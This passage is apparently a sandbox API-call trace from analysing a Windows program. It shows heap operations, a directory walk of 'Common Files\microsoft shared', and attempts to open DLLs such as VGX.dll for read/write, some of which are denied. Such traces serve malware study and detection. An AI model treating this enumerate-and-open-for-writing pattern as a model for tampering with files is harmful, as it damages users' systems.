returned 1 [0087.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0087.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0087.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 62 [0087.664] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.664] GetFileType (hFile=0x424) returned 0x1 [0087.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.664] CloseHandle (hObject=0x424) returned 1 [0087.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.666] AreFileApisANSI () returned 1 [0087.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0087.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ec68 [0087.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6ec68, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 62 [0087.666] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe87c00, ftCreationTime.dwHighDateTime=0x1cbfe36, ftLastAccessTime.dwLowDateTime=0x2ce22546, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0xcfe87c00, ftLastWriteTime.dwHighDateTime=0x1cbfe36, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50)) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0087.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.666] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x7a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x82de0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x7a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓൐\r⺊Āgr먤聤̓㑍Ā̓萐\x07̓뻌聤൐\r൐\rles\\microsoft shared\\VC\\msdia90.dll")) returned 0 [0087.666] FindClose (in: hFindFile=0x78410 | out: hFindFile=0x78410) returned 1 [0087.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0087.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b110 [0087.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0087.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0087.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.667] AreFileApisANSI () returned 1 [0087.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX", lpUsedDefaultChar=0x0) returned 51 [0087.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0087.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0087.667] AreFileApisANSI () returned 1 [0087.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46278 [0087.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX") returned 51 [0087.667] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.668] GetLastError () returned 0x5 [0087.668] GetLastError () returned 0x5 [0087.668] SetLastError (dwErrCode=0x5) [0087.668] GetLastError () returned 0x5 [0087.668] SetLastError (dwErrCode=0x5) [0087.668] GetLastError () returned 0x5 [0087.668] SetLastError (dwErrCode=0x5) [0087.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0087.668] AreFileApisANSI () returned 1 [0087.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46828 [0087.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX") returned 51 [0087.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.668] GetLastError () returned 0x5 [0087.668] GetLastError () returned 0x5 [0087.668] SetLastError (dwErrCode=0x5) [0087.668] GetLastError () returned 0x5 [0087.668] SetLastError (dwErrCode=0x5) [0087.668] GetLastError () returned 0x5 [0087.668] SetLastError (dwErrCode=0x5) [0087.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0087.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0087.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ac50 [0087.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0087.669] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0087.669] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78310 [0087.669] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.669] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a69a2a7, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xb3fd6e56, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x4a69a2a7, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0xf1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX.dll", cAlternateFileName="")) returned 1 [0087.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0087.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0087.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0087.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0087.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.670] AreFileApisANSI () returned 1 [0087.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll", lpUsedDefaultChar=0x0) returned 59 [0087.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0087.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0087.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.670] AreFileApisANSI () returned 1 [0087.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0087.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0087.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 59 [0087.670] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.671] GetFileType (hFile=0x424) returned 0x1 [0087.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0087.671] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.672] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.672] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.672] CloseHandle (hObject=0x424) returned 1 [0087.672] AreFileApisANSI () returned 1 [0087.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0087.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0087.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 59 [0087.672] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.672] GetLastError () returned 0x5 [0087.672] GetLastError () returned 0x5 [0087.672] SetLastError (dwErrCode=0x5) [0087.672] GetLastError () returned 0x5 [0087.673] SetLastError (dwErrCode=0x5) [0087.673] GetLastError () returned 0x5 [0087.673] SetLastError (dwErrCode=0x5) [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0087.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.673] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, 